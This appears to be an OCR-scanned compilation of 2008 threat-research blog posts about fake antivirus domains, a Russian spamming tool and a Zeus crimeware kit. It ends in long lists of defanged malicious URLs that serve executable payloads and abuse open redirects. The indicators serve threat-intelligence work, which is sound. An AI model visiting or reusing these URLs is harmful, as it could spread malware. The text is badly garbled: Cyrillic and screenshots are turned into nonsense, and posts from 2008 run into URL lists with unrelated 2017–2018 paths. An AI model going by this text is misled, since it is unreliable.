of money, clearly speaking for the revenues it is to prone to be generating. OPSEC (Operational 
Security) has been taking place across high-profile cybercrime communities during the last 
quarter, mostly in response to their increasing awareness that in the very same way they keep 
track of the major anti-fraud features implemented across their services of (ab)use, those 
implementing them could be monitoring them as well. 


1. http: //ddanchev. blogspot .com/2008/07/money-mule-recruiters-use-asproxs-fast .htm 


4.10.24 A Diverse Portfolio of Fake Security Software - Part Eleven (2008-10-28 15:44) 
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anti-malware0S.com 


antivir08.net 


av-xp2008.net 


bakasoftware.com 


mail.anti-matware09.com 


mail.av-xp2008 net 


ns1 bakasoftware,com 


119.47.81.0/24 ——_ AS gy AS39186 
ns2.anti-malware039,com 


\ NEI 
119.47.81.140 PTR 
N$2.av-xp2008.net ‘4 A ide-140-81-47-119 firstnetcom.com 


ns2.bakasoftware,com 
ns3.anti-malwared9.com 
ns3.antivir08.net 
ns3.av-xp2008.net 
ns3.youpornzztube.com 
ns4.antivir08.net 
ns4.av-xp2008.net 
The following portfolio of fake security software appear to have been integrated within traffic 
redirection doorways during the weekend, consequently redirecting hundreds of thousands 


of users acquired from blackhat hat SEO, malvertising, email spam and SQL injections, to 


non-existent security vendors and their non-existent security products. Here’s an excerpt 
from one of the templates that they’re using : 
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S) e-Kerberos 


What is eKerberos? 


Overview Purchase 


Download Features 


Why is eKerberos better then standard 
antivirus programs? 


Technical features 


"Since its first establishement in 2001, Antivirus V.I.P consistently maintained its position 
as one of the world’s leading companies in antivirus research and product development. 
Antivirus V.I.P is known mostly for Antivirus V.I.P, its powerful mix of Anti-Malware, Anti-Virus, 
Anti-Trojan, Anti-Backdoor, Anti-Worm and Anti-PornoDial in one program. Antivirus V.I.P 
scans and removes trojans and other malware, which can be placed on a computer without 
the owner’s knowledge. 


Antivirus V.I.P is a powerful and easy-to-use Trojan horses, Viruses and all types of Mal- 
ware removal software, which detects and eliminates more than 100’000 Trojan Horses and 
Spywares. It also detects viruses, trojans, worms, spyware, malicious ActiveX controls and 
Java applets. The latest version of Antivirus V.I.P features outstanding detection abilities, 
together with high performance. Antivirus V.I.P creates best anti-virus, anti-trojan and anti- 
spyware security solutions that protect computer users from ever-increasing cyber threats 
and all the dangers of the new century." 
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| Your safe web-surfing solution 


MORE REALIABLE P GENIUNE | 


dis teal 
be 


MORE EFFECTIVE 


7.0 . MORE PROACTIVE 
* ners Buy and download 


- our latest products 


Ss 


Scan your system forfreenow & 


Ares V.LP aporove Dat nus 


ord bojen atta domege more Antivirus V.I.P key features 


virus appears each hour. One of 

sip taaeenied ian © Fd Widows IP Service Pack 3 Seaurty Center Support 

CRecceeen hasteees © RescveScan Tedwology - With Ultra tagh speed scan rescveng you's PC from viruses for 
COT ECIES matter 2 et of mans. few seconds! 


© Ulmate Live Update - Each 2 how's anti-virus Dates and moddes are completely uocened. 
ANAS \.LP stands sertnd over you Drivecy ard Gerntty! 


© Armes V.LP finds out ard removes more fan 320000 Trojan horzes, Soyware, Viruses, 
Mackert, Adware, Keyloggers and another harmeare; 

© Antvrus V.LP allows scan fies quckly and access other featres Antivirus ¥.1P drecty 
fom Windows Exgiorer; 

© Removes “sctve bojan® fom a dk even fit @ biocne the He: 

© Removes tojan flies are locked for writing (for example. DLLs being used); 

© Gent backdoor and worm protecton; 

© Supports compressed fies scan; 

© Reports and Actvity Log Anctonality; 

© Wut Removal Assatant can force dean the sh.ttorn tora and spymare than the offer 
removal tool cannot; 

© The Sehever Anatyas Techrotogy can find out the unknown trojans and spynare better; 

© The schedkied scan supports automatic scan at spectied tme; 

© Lomest CPU uaage rate, best performance and modern user Gut. 


And the domains and their associated IPs: 


antivirus-freescan .com (208.72.169.100) 
defendyourpc .com 

mycupupdate .com 

secureupdatecenter .com 
secureupdateserver .com 
webscannertools .com 
secureyourpayments .com 
protection-overview .com 


save-my-pc-now .com (84.243.196.136; 89.149.227.196; 89.149.227.232) 
antivirus-pcscan .com 

hiqualityscan .com 

active-scanner .com 

perfectscanner .com 


livesecurityinfo .com (216.240.134.208) 
protection-freescan .com 
antvirushelp .com 
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prosecurity-audit .com 


scan-my-pc .com (89.149.251.56) 
securedclickhere .com 


ie Antivirus 2009 


Local Disk (C:) Local Settings 


= = Local Disk (0;) 
ad @ system errors =e @ 00 ersers @ infectes 


Rems processed 282 
ERRORS FOUND: $8 


(MALWARE THREAT 


Capyreght © 2007 F000 XP eateries | All Raghts Reverved 


premiumlivescan .com (78.159.118.217; 89.149.253.215; 216.240.134.211) 
quick-live-scan .com 


ekerberos .com (77.244.220.134; 119.47.81.140; 218.106.90.227) 
virtualpcguard .com (67.55.81.200) 
antivirus-vip .com (216.32.76.87) 


As l’ve already pointed out numerous times in the past, on the majority of occasions 


the "campaigners" aren’t fully taking advantage of the evasive features that their traffic 
management kits empower them with. 
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Related posts: 

[1]A Diverse Portfolio of Fake Security Software - Part Ten 
[2]A Diverse Portfolio of Fake Security Software - Part Nine 
[3]A Diverse Portfolio of Fake Security Software - Part Eight 
[4]A Diverse Portfolio of Fake Security Software - Part Seven 
[5]A Diverse Portfolio of Fake Security Software - Part Six 
[6]A Diverse Portfolio of Fake Security Software - Part Five 
[7]A Diverse Portfolio of Fake Security Software - Part Four 
[8]A Diverse Portfolio of Fake Security Software - Part Three 
[9]A Diverse Portfolio of Fake Security Software - Part Two 
[10]Diverse Portfolio of Fake Security Software 


. http: //ddanchev. blogspot .com/2008/10/diverse-portfolio-of-fake-security_22.htm 


ttp://ddanchev. blogspot .com/2008/10/diverse-portfolio-of-fake-security_16.htm 


. http: //ddanchev. blogspot .com/2008/10/diverse-portfolio-of-fake-security.htm 


. http: //ddanchev. blogspot .com/2008/09/diverse-portfolio-of-fake-security_30.htm 


. http: //ddanchev. blogspot .com/2008/09/diverse-portfolio-of-fake-security.htm 


. http: //ddanchev. blogspot .com/2008/08/diverse-portfolio-of-fake-security_25.htm 


ttp://ddanchev. blogspot .com/2008/08/diverse-portfolio-of-fake-security_20.htm 


. http: //ddanchev. blogspot .com/2008/08/diverse-portfolio-of-fake-security.htm 
10. http: //ddanchev.blogspot .com/2007/12/diverse-portfolio-of-fake-security.htm 


1 
2 
3 
4 
5. http: //ddanchev. blogspot .com/2008/09/diverse-portfolio-of-fake-security_24.htm 
6 
7 
8 
9 


4.10.25 Pseudo Email Marketing Tools Empowering Spammers (2008-10-29 15:28) 


1976 


OCHOBHAaA MHopmauysa CTaTucTKka no Smtp npasrinam 


MHcbopmauyid o paccbinke 


| Mima paccbinkw: $Paccbinka - iSmMeHeHiMa LEH 


| Aata cosgaHna: 


| PaBoyaa nanka: ‘Data'Mailing1 


| Nocn.sanyck: 


| OCT@HOB NeHa: B Otnpas neno 582 % 


B He otnpas nero 5,22 % 
| Bpemanpowno: O yacos, 2 mMHYyT. BMnoxux 2.54 % 


; B He npunato 2,68 % 
| CpeaH.ckopoctb:1638/mun, 98310/4ac, 2359440/neHb. Bl Vicxnoueo 1.28 % 


‘Mporecc: 24% B Octanoct 30,08 % 


Ofsop HacTpoeK _ PesynbTaTbl 


| OTnpasuTenbCynepDupma - oTAen npogaxk stest@mail.ru> Otnpasneno: 3277 NoctpouTa 


Nonyyatenu: Mailing Lists=Bce kKnMeHTbI He otnpasneno: 294 NoctTponTb 


| Nuicbmo: ASMEHEHMA LIGH Ha TOBApbI Mnoxux: 143 _NoctTponte 


CHETHMK OTKPbITbIX nucem: Ja He npuuateix: 151 | NocTponTb 


| OTcnexnBaenbie cobink: = fla Mckmwouennpix: 72 NocTpouT 


Peskin paccbinki: BoTPOeHHbIM CepBep, Personal Copy Octanocp: 1694 NocTpouTb 


[MoToKos: 120 Mucem orkppiro: 568 ‘Toetpours 


Yepes npoKkcu: Het KauKkos: 371 NocTpouTb 


Largely ignoring its real life applicability, a vendor of "email marketing" tools continues the 
development of a DIY spamming tools, whose features greatly evolved throughout the last 
couple of years. Originally released in 2004, the vendor appears to have been actively 
improving the real-time metrics of the campaigns, next to building interactivity into the 
spamming process through the WYSIWYG editor. 


For better or worse, despite that these applications are empowering spammers and low- 
ering down the entry barriers into spamming, the tools have gotten [1]largely replaced by the 
[2]increasing number of [3] managed spamming services, whose quality assurance features 
of bypassing spam filters act as a main differentiation factor. Here are some of this tool’s 
features : 


1977 


Nocnare nuctmo: Viomerenva eH Ha TOBAapbI 


"- High speed distribution - 200,000 letters per hour. 

- Contains an embedded SMTP server that allows you to send letters directly to the recipient’s 
mailbox without using your provider's SMTP server. 

- If you are accessing the Internet via modem, and distribution using the SMTP server, you do 
not fit - also allowed to send mail through any number of remote SMTP servers (relay), or via 
SMTP server provider. 

- Support for SMTP authentication. 
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Tenepes Hrope Bracroposws 
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- Supports up to 500 concurrent streams to send to each mailing. 

- Automatic caching DNS requests to speed up distribution and reducing the load on the DNS 
server. 

- Ability to run multiple independent shots at the same time. 

- Ability to suspend delivery and continue later with a point. 

- All modes distribution - TO, CC, BCC and PersonalCopy. In the latter case, the program 
generates a personal letter to each recipient. 
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hxxp://arbondal[.]eco-link-shop[. ]ru/goinf _plugin[.]lexe?etag=b904d31a94309e339f9569- 
69e4df518e 


hxxp://arbondal[.]eco-link-shop[. ]ru/goinf _plugin[.]exe?etag=be9a14220671fb43559dab- 
aa3ce47d87 

hxxp://arbondaf[. ]Jecolink24[.]ru/goinf _plugin[.Jexe?etag=50df1583b9d91e1f228c34- 
O5fb6a669c 

hxxp://arbondaf[. ]Jecolink24[.]ru/goinf _plugin[.]lexe?etag=6437 8fddbda9a06272e427- 
5b5225489d 

hxxp://arbondaf[. ]Jecolink24[.]ru/goinf _plugin[.]lexe?etag=6739db3d73ad39d52d464e- 
9ba3a45cb2 

hxxp://arbondaf[. ]Jecolink24[.]ru/goinf _plugin[.]exe?etag=6ab1145ca0da4df0173bf2- 
519d2e898b 


hxxp://ardiganshi[.]eco-link-shop[.]Jru/goinf _plugin[.Jexe?etag=9b84ee895409b5d148ed6c- 
c61517facb 


hxxp://ardiganshi[.]eco-link-shop[.]ru/goinf plugin _cis[.Jexe?etag=56846c6a9c300a9912bafb8f7- 
4315fc3 


hxxp://ardiganshil[.]eco-link-shop[.]ru/kinoroom _browser[.]exe?etag=64bf407cee64409502dcc- 
8f5ca219684 


hxxp://ardiganshi[.]ecolink24[.]ru/goinf _plugin[.lexe?etag=d2ac055d42af022e8b7294- 
7d69796995 

hxxp://aressala[.]eco-link-shop[.]ru/goinf _plugin[.Jexe?etag=f730f40145f2a183d3dcf8- 
15a17f3ff9 


hxxp://aressala[.Jecolink24[.]Jru/goinf plugin _cis[.Jexe?etag=1c5bbdec905fad5552c55e3cf- 
5a65daa 


hxxp://aressala[.Jecolink24[.]Jru/goinf plugin _cis[.]exe?etag=3ea87f25d53c7891fd3b7a261- 
8bd6590 


hxxp://aressala[.Jecolink24[.]ru/goinf plugin _cis[.Jexe?etag=9574d71a20eee7bb265c7db12- 
2ce28e6 


hxxp://argasia[.Jecolink24[.]Jru/goinf _plugin —_cis[.Jexe?etag=d6cf615fa8d2f6d96c3ca9b39- 
9721326 


hxxp://arginata[.]eco-link-shop[. ]ru/goinf _plugin[.]exe?etag=a1608c3531a0f609e4841a- 
1c376a94ff 

hxxp://arginata[.]eco-link-shop[. ]ru/goinf _plugin[.]lexe?etag=fa9db8b92de0dcbabe96ce- 
e4652019a3 

hxxp://arginata[.]ecolink24[.]ru/goinf _plugin[.Jexe?etag=4bf50bf316048df93c8799- 
6cd32c7ea7 

hxxp://arginata[.]Jecolink24[.]ru/goinf _plugin[.]exe?etag=ba74d5fc5b763a16a81925- 
786a84d015 

hxxp://arginata[.]ecolink24[.]ru/goinf _plugin[.lexe?etag=f9a508c852988b21e548da- 
2bfe12d735 


hxxp://arginata[.]Jecolink24[.]ru/goinf plugin _cis[.]Jexe?etag=1b883c0f19e3561bee6eeabe7- 
755a572 
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hxxp://arietaria[.]ecolinkshop[.]ru/goinf_plugin _cis[.Jexe?etag=27e7d24110602347d55b8dc88- 
75a92df 


hxxp://arisimbi[.]eco-link-shopf[. ]ru/ 


hxxp://arisimbil[.]eco-link-shop[.]ru/goinf_ plugin _cis[.Jexe?etag=3fb9ec87daa7b07f3650a0773- 
c5d7a34 


hxxp://arisimbil[.]ecolink24[.]ru/2inf _autorun[.]exe?etag=585c0ecOb2f4af99b0b30- 
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~ Bce npasuna 
~ Npasuna O6paé6or«n Nourei 
Mpumep npasuna Noanuckn 
Mipwmep npapana Orme 
Nipwmep KoMnnekcHoro npasuna (NognncKa, OTncKa, Vaenevenve MaHHbixX, Sanyck BHEWHE 
= Cneywanbubie npasuna 
O6pa6otka Web Popm 
O6pa6otka Bosspatos 


_ teem | [Gv | | Xmen | | (RT 
ECU Message Subject Cogepxnr “unsubscribe” AIIM Message Subject Cogepxnr "remove" ANU Message Subject 


Conepxut “delete” ANIM Tema MvcbMa Cogepmnt “ynanwrb” 
BeinonHuT’ cnepyrouwe felicTanA 


Yaanutb Anpec oTnpaenrena us: Boe Cnvckn>Mpumep Cnncka Paccbinkn>MognnewnKn 

Qo6asuts Mma uv Agpec oTnpaputrena B: Bce Cnucxn>Npumep Cnvicxa Paccbinks>OTnncaswnecr 

Ao6asutTb Agpec oTnpasuTenn B: "CnncoK VicknioyeHnii" 

OtTnpasuTb NogTeepxpeHne: NomTBepgauTe OTNMICKYy OT HALUMX PaccbiNOK | 

VUcnone308aTb DunbTp NogTBepxgexna: NonyyaTen’ AOMKeH KNMKHYTb Ha CCbINKy BHYTDM NViCbMa-nogTBepxAeHNA 
OtTnpasvitb Yeefomnenne: Bei Sbinv oTNMCaHbI OT paccbinm 

Yaanutb coobwexne c cepsepa 


- Ability to create lists of addresses, depending on the specific responses of remote servers for 
SMTP commands. 

- Organize automatically subscribe / unsubscribe to the mailing addresses. 

- Perform any processing of existing lists. 

- Develop a letter to the powerful WYSIWYG Html editor. 


- Automatically apply to each recipient by name, as well as paste in a letter to a spe- 
cific, personalized information through powerful Mail Merge templates. 
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- Set the calendar to automatically launch shots at the right time. 
- Quickly send out mail." 


With managed spam services’ on-demand, risk forwarding and completely outsourced 
processes, they’re not only going to replace such DIY tools, but also, [4]position them as a 
dynamically evolving [5]cybercrime platforms. 


1. http: //ddanchev. blogspot .com/2008/07/dissecting-managed-spamming- service. htm 

2 

3 
4 

5. http: //ddanchev. blogspot .com/2008/10/managed-fast-flux-provider-part-two.htm 


4.11 November 


4.11.1 Modified Zeus Crimeware Kit Gets a Performance Boost (2008-11-03 16:22) 


1982 


hxxp://esniewskil[.]ecolinkshop[. ]ru/goinf _plugin[.Jexe?etag=a0e795b4304e30aae86747- 
4153528a40 


hxxp://esniewskil.Jecolinkshop[.]ru/goinf plugin _cis[.Jexe?etag=e89c6291d7af27e216b89d4f0- 
977ala3 


hxxp://esopotamial[.]ecolink24[.]ru/goinf _plugin[.]exe?etag=ad5f831dabfe284fe39e30- 
044744a4ae 

hxxp://esopotamial[.]ecolink24[.]ru/goinf _plugin[.Jexe?etag=f72ad5d4e3b2782e30b80c- 
2f1927af00 


hxxp://esopotamia[.]ecolinkshop[.]ru/goinf _plugin[.Jexe?etag=0dd162fecc537eeb91076f- 
cbb29b4279 


hxxp://essarabia[.]eco-link-shop[.]ru/goinf _plugin[.]exe?etag=60afe846aeee7a0b4a0450- 
06c3785alc 


hxxp://essarabia[.]eco-link-shop[.]ru/goinf plugin _cis[.Jexe?etag=bf36dc8d2a92b670a5fe52f47- 
32da053 


hxxp://essaydoc[.]copy-max[.]com/free-essays/1/essay/personal-essay/ 


hxxp://esselia[.]eco-link-shop[.]ru/goinf _plugin[.]exe?etag=3539513dfc6ef67bdc3092- 
97d9a30e7e 


hxxp://esselia[.Jeco-link-shop[.]ru/goinf_ plugin _cis[.Jexe?etag=2fdd49e8dd825b4131f1729d3- 
d0b94b9 


hxxp://esselia[.]eco-link-shop[.]ru/goinf plugin _cis[.]Jexe?etag=a81f4a253187118c09812b683- 
036b425 


hxxp://esselia[.Jecolink24[.]ru/ 


hxxp://eteromyaria[.Jecolinkshop[.]ru/goinf plugin _cis[.Jexe?etag=5a5e29d3c2d2babf932b0e0cd- 
Abfccaa 


hxxp://eteromyaria[.]ecolinkshop[.]ru/net _security[.]exe?etag=65676e8084839cb2c/7fc- 
b0872765c741 


hxxp://etf[.]uoancorp[. ]life/ 

hxxp://etz[.]zend[.]4pu[.]com/ 
hxxp://etz[.]zend[.]4pu[.]com/sitemap8[.]htm! 
hxxp://eva[.]smartwritingservice[.]4pu[.]com/article/1/essay/72 / 
hxxp://evs[.]smartwritingservice[.]4pu[.]com/article/2017722/she- walks/ 


hxxp://evs[.]smartwritingservice[.]4pu[.]com/essay/2017223/my-las t-duchess-poem- 
annotated/ 


hxxp://ewx[.]Jauctions2018[.]dnsalias[.]net/ 


hxxp://experiencebarbados[.]org/Redirect[.]aspx?url=hxxp://afb[.] mama- 
shoping[.]cloudns[.]cx/sitemapf[. ]txt 


hxxp://experts[. ]loveessay[.]dnsalias[.]com/review/1/essay/98 
hxxp://eyt[.]kladtv[.]Jcom/ 


hxxp://ezproxy[.]aepni[.]talonline[.]ca/login?url=hxxp://etz[ .]zend[.]4pu[.]com/si- 
temap8g[.]html 


19793 


hxxp://ezproxy[.]uzh[.]ch/login?url=hxxp://ftp[.]auctions2018[. Jhomelinux[.]com/ 
hxxp://ezproxy[.]Juzh[.]ch/login?url=hxxp://wwm[.]auctions2000[. Jmyphotos[.]cc/ 
hxxp://far[. ]astra[.]cloudns[.]cx/ 
hxxp://fasol[.]tv/bitrix/rk[.]php?goto=hxxp://afe[.]Jmamashoping [.]cloudns[.]cx/ 
hxxp://fcq[. ]Jauctions2018[.]dnsalias[.]net/ 

hxxp://fep[.]astra[.]cloudns[.]cx/ 

hxxp://feudalism[. ]lovemilay[.]from-ca[.]com/essay/8/paper/32 
hxxp://ffz[.]Jsmartwritingservice[.]4pu[.]com/essay/1/pap er/60/ 


hxxp://finalvids[.]com/crtr/cgi/out[.]cgi?id=78 &l=top footer &u=hxxp://qxj[.]goldenshopone[.]from- 
ca[.]com/ 


hxxp://fjb[. Jsmartwritingservice[.]4pu[.]com/review/1/paper/25/ 


hxxp://fjil. Jsmartwritingservice[.]4pu[.]com/article/20171217/t his-type-of-sculpting-portrays- 
an-exact-reproduction-of-an-object/ 


hxxp://fjil. ]smartwritingservice[.]4pu[.]com/topic/2017115/compar ing-james-and-jung’s- 
perspectives-on-religious-experience-essay/ 


hxxp://fkp[.]goldenshopone[.]from-ca[.]com/ 
hxxp://fkr[.]Jgoldenshopone[. ]from-ca[.]com/ 


hxxp://fleurie[.]be/gastenboek1/go[.]php?url=hxxp://aek[.]mamasho ping[.]- 
cloudns[.]cx/sitemap[. ]txt 


hxxp://fmr[.]goldenshopone[.]from-ca[.]com/ 
hxxp://forces[.]eco-link-shop[.]ru/ 
hxxp://forces[.]eco-link-shop[.]ru/setsearchm[.]Jexe 
hxxp://fpul[.]smartwritingservice[.]4pu[.]com/free-essays/1/paper/ 26/ 
hxxp://fql[.]goldenshopone[.]from-ca[.]com/ 
hxxp://frank[.]oneshop[.]getmyip[.]com/review/1/38 
hxxp://fredericks[.]oneshop[.]getmyip[.]com/review/1/14 
hxxp://freeretrotube[.]org/cgi-bin/crtr/out[.]cgi?url=hxxp://wfm[. Juoancorp[. ]life/ 
hxxp://fso[. auctions2018[.]homelinux[.]net/ 
hxxp://fsq[.Jauctions2018[.]homelinux[.]net/ 

hxxp://ftp[. auctions2018[.]homelinux[.]com/ 

hxxp://ftx[. Jauctions2018[.]dnsalias[.]net/ 

hxxp://ful. shopmarket[.]from-ca[.]com/ 


hxxp://fuck-you[.]ru/cgi-bin/out[.]cgi?n=vstret &id=1834 &url=hxxp://acl[.] mamashoping[.]cloudns|[.- 
]cx/sitemap[. ]txt 


hxxp://fuhkomsqIh[. ]net/lilik/content/5c999691bf1874c24a79bffb036 4f68e 
hxxp://fuhkomsaIh[. ]net/lilik/content/?user= 

hxxp://furnation[. ]ru/go[.]php?u=hxxp://ahb[.]mamashoping|[.]c loudns[.]cx/ 
19794 


hxxp://furnation[.]ru/go[.]php?u=hxxp://nib[. auctions2018[. ]dnsalias[.]net/ 
hxxp://fus[.]smartwritingservice[.]4pu[.]com/article/1/paper/45 / 
hxxp://fus[.]smartwritingservice[.]4pu[.]com/topic/1/essay/49/ 


hxxp://fusion[.]adtoma[.]com/event/slump/tracking[.]klick/12277 8908618/click?url=hxxp:- 
//qkm{[.]Jauctions2018[.]homelinux[.]com/ 


hxxp://fxw[.]Jauctions2018[.]homelinux[.]net/ 
hxxp://gax[.]auctions2000[.]myphotos[.]cc/ 
hxxp://gbq[.]smartwritingservice[.]4pu[.]com/topic/1/essay/23/ 
hxxp://gch[.]goldenshopone[.]from-ca[.]com/ 
hxxp://gdo[.]goldenshopone[. ]from-ca[.]com/ 
hxxp://get[.]powershop[.]mine[.]nu/article/2/22 
hxxp://geu[.]smartwritingservice[.]4pu[.]com/review/1/essay/43/ 
hxxp://gfgxfhl[.Jicu 

hxxp://gfx[.]goldenshopone[.]from-ca[.]com/ 
hxxp://ghy[.]smartwritingservice[.]4pu[.]com/article/1/paper/57/ 
hxxp://gib[.]goldenshopone[. ]from-ca[.]com/ 
hxxp://gifts[.]powershop[.]mine[.]nu/topic/5/18 
hxxp://gkn[.]deadlines[.]4pu[.]com/essay/2017824/495/ 
hxxp://gnp[.Jastra[.]Jcloudns[.]cx/ 
hxxp://go[.]Jivey[.]ca/boutiquesinlongbeach102661 
hxxp://goat[.]oneshop[.]getmyip[.]com/article/1/69 
hxxp://god[.]loveessay[.]dnsalias[.]Jcom 
hxxp://goh[.]smartwritingservice[.]4pu[.]com/review/1/essay/90/ 


hxxp://goinglup55[.]lupprelaunch[.]com/Redirect[.]asp?UID=2749349 &SubSectionID=-1 
&AdArrayID=2 &AdPosition=1 &Linkurl=hxxp://iod[.]goldenshopone[. ]from-ca[.]com/ 


hxxp://golf[. ]supershoping[.]dnsalias[.]com/wedding-cake-servers- and-knives[.]htm 
hxxp://gpv[.]goldenshopone[. ]from-cal[.]com/ 
hxxp://grandma[.]powershop[.]mine[.]nu/article/5/23 
hxxp://gsq[.]deadlines[.]4pu[.]com/sj/9/ 
hxxp://gte[.]kladtv[.]com/ 
hxxp://guide[.]powershop[.]mine[.]nu/review/2/33 
hxxp://gus[.]goldenshopone[. ]from-ca[.]com/ 
hxxp://gwd[.]Jauctions2000[. ]cloudns[.]cx/ 
hxxp://gwn[.]Jauctions2018[.]homelinux[.]net/ 
hxxp://gx-opera[.]com 
hxxp://gx-operal[.]com 

19795 


hxxp://gxopera[.]com 

hxxp://gxopera[.]com 

hxxp://gxoperabrowser[.]com 

hxxp://gxoperabrowser[.]com 

hxxp://gyvunuviesbuciai[. ]It/url[.]pohp?url=hxxp://aje[.]ma mashoping[.]cloudns[.]cx/sitemapf[. ]txt 
hxxp://gzl[.]smartwritingservice[.]4pu[.]com/free-essays/1/essa y/48/ 
hxxp://hafriend[.]com/link[.]php?url=hxxp://mhal[.]goldenshopone [.]from-cal[.]com/ 


hxxp://nhamesen-gigarank[. ]net/out[.]php?id=00011 &go=hxxp://fxw[.]Jauctions2018[.]homelinux- 
[.]net/ 


hxxp://hangsha[.]eco-link-shop[. ]ru/ 
hxxp://hangsha[.]eco-link-shop[.]ru/goinf plugin[.Jexe 
hxxp://hangsha[.]eco-link-shop[.]ru/goinf _plugin[.]exe? 


hxxp://harybdil[.]eco-link-shop[.]ru/goinf plugin _cis[.Jexe?etag=6f855e4a4f0cc63366d27f2d4- 
a739d46 


hxxp://harybdil[.]lecolinkshop[.]ru/goinf plugin _cis[.]exe?etag=b13c29c07c4bc65a497c29765- 
191476d 


hxxp://hassela[.]eco-link-shop[. ]ru/goinf _plugin[.lexe?etag=a20bd58a357694fb8eecf9- 
bef7321718 


hxxp://hatelperronia[.]eco-link-shop[.]ru/goinf _plugin[.]exe?etag=85038126fcb4734494a68c- 
b03b29b7d5 


hxxp://hatelperronia[.Jecolinkshop[.]ru/goinf _plugin[.Jexe?etag=912daef562d3ed9835f35f- 
cfba284299 


hxxp://haulagi[.]eco-link-shop[. ]ru/goinf _plugin[.lexe?etag=46b8751d731d8f22f4b272- 
574f3c8470 

hxxp://haulagil.]eco-link-shop[.]ru/goinf _plugin[.]lexe?etag=82ead8829a6bcd4f1d7b8b- 
f3bfa2dc75 

hxxp://haulagil.]ecolinkshop[.]ru/goinf _plugin[.lexe?etag=bc88994a08044c94290e8a- 
8f88524ee4 


hxxp://hbs[.]goldenshopone[.]from-ca[.]com/ 


hxxp://hechoslovakial[.Jeco-link-shop[.]ru/goinf_ plugin _cis[.]Jexe?etag=b3191112e0b7e77681b2383e8- 
e9af385 


hxxp://hekhovial[.]Jecolinkshop[. Jru/ 


hxxp://heltenhal[. ]eco-link-shop[. ]ru/goinf _plugin[.]lexe?etag=26b93acc43b34822a61865- 
1627abd791 


hxxp://heltenha[.]eco-link-shop[. ]ru/goinf _plugin[.]lexe?etag=2dd189c6c1966d90255849- 
37ae5f000e 


hxxp://heltenha[.]eco-link-shop[. ]ru/goinf _plugin[.lexe?etag=5e3d06709ab5f563be4f90- 
7€21821e89 
hxxp://heltenha[.]eco-link-shop[. ]ru/goinf _plugin[.Jexe?etag=75d17ecf746b895ed109c3- 
9c635512af 


19796 


hxxp://heltenha[.]eco-link-shop[.]ru/goinf _plugin[.lexe?etag=8faeb9 7 4fd43f9fc7 ebf6c- 
feOd07dfea 


hxxp://heltenha[.]eco-link-shop[.]ru/goinf _plugin[.]exe?etag=b18264b5cbbbc18b5bb786- 
24alb7af93 


hxxp://heltenha[.]eco-link-shop[.]ru/goinf _plugin[.Jexe?etag=cf89abbea5ab9949aee8d8- 
1lc3aabad79 


hxxp://heltenha[.]eco-link-shop[.]ru/goinf _plugin[.]Jexe?etag=d71954785a412e09554389- 
f72daa5d6a 


hxxp://heltenha[.]eco-link-shop[.]ru/goinf _plugin[.Jexe?etag=f788e99bd7bc9f2de53dde- 
5123f2912f 


hxxp://heltenha[.]eco-link-shop[.]ru/goinf plugin _cis[.]Jexe?etag=1fec8811bf2d64d89c5256a48- 
468e9b2 


hxxp://heltenha[.]eco-link-shop[.]ru/goinf plugin _cis[.Jexe?etag=3906bd1d01f18683232a37ff9- 
21ead92 


hxxp://heltenha[.]eco-link-shop[.]ru/goinf plugin _cis[.Jexe?etag=48d6bb67af4b4e61f86alec42- 
O0c59fc8 


hxxp://heltenhal[.]Jeco-link-shop[.]ru/goinf plugin _cis[.]Jexe?etag=52f3362fb753ab7a80f9425d2- 
3lab2ba 


hxxp://heltenha[.Jeco-link-shop[.]ru/goinf plugin _cis[.]exe?etag=62dd421a8417f0f4cb5a52200- 
cclaf62 


hxxp://heltenha[.Jeco-link-shop[.]ru/goinf plugin _cis[.Jexe?etag=67c2204b96ec8e50400947dd8- 
fb89a89 


hxxp://heltenha[.]eco-link-shop[.]ru/goinf plugin _cis[.Jexe?etag=b52a24955a66fa40b49a49434- 
1b7703d 


hxxp://heltenha[.]eco-link-shop[.]ru/goinf plugin _cis[.Jexe?etag=b6e6a976d9f935f5ff6fe218c- 
2aacl65 


hxxp://heltenha[.]eco-link-shop[.]ru/goinf plugin _cis[.Jexe?etag=d4262e75cd6b39e5f2841dc12- 
b3362ec 


hxxp://heltenha[.]eco-link-shop[.]ru/goinf plugin _cis[.]Jexe?etag=e1773f5120c1le7c6208bf512b- 
bf1830d 


hxxp://heltenha[.]eco-link-shop[.]ru/kinoroom _browser[.]exe?etag=30c5bf465ede44c11886c- 
a1308e160ac 


hxxp://heltenha[.]eco-link-shop[.]ru/kinoroom _browser[.]exe?etag=36731b12023554e57b3ee- 
9e5156516a8 


hxxp://heltenha[.]eco-link-shop[.]ru/nethost[.]exe?etag=d7943246b8d - 
816a4c9db205dbea79beb 


hxxp://heltenha[.]eco-link-shop[.]ru/nethost[.]exe?etag=dc898960b 62- 
42871ec9754c0d1c2a9c3 

hxxp://heltenha[.]eco-link-shop[.]ru/vkmusicdownloader[.]exe?etag =0- 
d5982713e05e4f59b8fb3d2364f1718 
hxxp://heltenha[.]eco-link-shop[.]ru/vkmusicdownloader[.]exe?etag =1- 


c6771db01894f9179a13473357ab197 


hxxp://heltenha[.]eco-link-shop[. ]Jru/vkmusicdownloader|.]lexe?etag =7- 
eff41d400f549bd1d7aafb87bf63lae 


hxxp://heltenha[.]eco-link-shop[.]ru/vkmusicdownloader[.]exe?etag =d- 
71954785a412e09554389f72daa5d6a 


hxxp://heltenhal[.]ecolinkshop[. ]ru/ 


hxxp://heltenha[.]ecolinkshop[.]ru/goinf _plugin[.]exe?etag=3172b5204d39be41466ede- 
69d46e129d 

hxxp://heltenha[. ]ecolinkshop[.]ru/goinf _plugin[.]lexe?etag=47b1a9e5295dda8ef499db- 
7a89b30620 

hxxp://heltenha[. ]ecolinkshop[.]ru/goinf _plugin[.Jexe?etag=4cb2da50c8f07d257f5e68- 
04170c7774 

hxxp://heltenha[. ]ecolinkshop[.]ru/goinf _plugin[.Jexe?etag=7164b796a3900bd7afd57f- 
82e92c9b92 

hxxp://heltenha[. ]ecolinkshop[.]ru/goinf _plugin[.]exe?etag=7a88699ab548173708ddb5- 
5cd74f0882 

hxxp://heltenha[. ]ecolinkshop[.]ru/goinf _plugin[.]exe?etag=8bf03f523f5a623852ec3b- 
5925b33aa5 

hxxp://heltenha[. ]ecolinkshop[.]ru/goinf _plugin[.lexe?etag=bedb4f20f759137ea73bc7- 
814f9dd26d 

hxxp://heltenha[.]ecolinkshop[.]ru/goinf _plugin[.Jexe?etag=cdac144d6328a6bb73791f- 
064721e0d5 

hxxp://heltenha[. ]ecolinkshop[.]ru/goinf _plugin[.]lexe?etag=dca83a01163ccdeecacba0- 
5abb87cc94 

